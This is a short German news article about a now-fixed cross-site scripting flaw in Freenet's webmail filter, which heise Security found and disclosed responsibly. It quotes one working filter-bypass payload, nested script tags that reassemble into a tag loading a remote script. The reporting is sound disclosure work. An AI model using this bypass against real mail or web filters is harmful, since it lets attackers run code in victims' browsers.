Das Team von heise Security ist im Rahmen der Recherchen zu einem Artikel auf eine gravierende Sicherheitslücke in der Weboberfläche von Freenet angestoßen. Diese Sicherheitslücke erlaubt es kriminellen Angreifern Javascript-Code auf dem Computer des Opfers auszuführen, ohne dass dieser etwas dagegen unternehmen kann. Bereits das Öffnen der E-Mail reicht aus, um den potenziell gefährlichen Code auszuführen. Gegen diese Art Attacken helfen nur noch wenige Vorkehrungen, die der Benutzer bewusst installieren muss.
Normalerweise werden in einer E-Mail alle Javascript-Tags durch einen Filter von Freenet entfernt, wodurch das Einschleusen von Code verhindert werden soll. Jedoch gab es eine Schwachstelle in diesem Filter, die so ausgenutzt werden konnte, dass weiterhin Code auf dem Computer des Empfängers ausgeführt werden konnte. Vor der Veröffentlichung eines Artikels im eigenen Online-Magazin kontaktierte heise die Betreiber von Freenet und sorgte somit dafür, dass der Filter innerhalb weniger Stunden überarbeitet und abgesichert werden konnte. Die Sicherheitslücke besteht zum aktuellen Zeitpunkt also nicht mehr.
Ob die Sicherheitslücke in der Vergangenheit ausgenutzt wurde, bis zum aktuellen Zeitpunkt jedoch noch unklar. Dieses von heise.de stammende Beispiel zeigt deutlich, wie der Filter ausgetrickst werden konnte:
<sc<script></script>ript type=”text/javascript” src=”http://www.heise.de/security/dienste/browsercheck/tests/script-msg.js”></sc<script></script>ript>
Zwar wurden die beiden inneren Tags “<script>” vollständig entfernt, was jedoch im Umkehrschluss dafür sorgte, dass die beiden äußeren Tags zu einem gültigen Befehl zusammengesetzt wurden. Ein Versäumnis, das es Angreifern ermöglichte, ihren eigenen Javascript-Code über das Internet nachzuladen oder Empfänger E-Mail-Adressen zu bestätigen. Zwar zeigte der Filter an dieser Stelle einen Fehler auf, der normalerweise nicht hätte passieren dürfen, jedoch ist die Reaktionsgeschwindigkeit seitens Freenet vorbildlich und positiv hervorzuheben.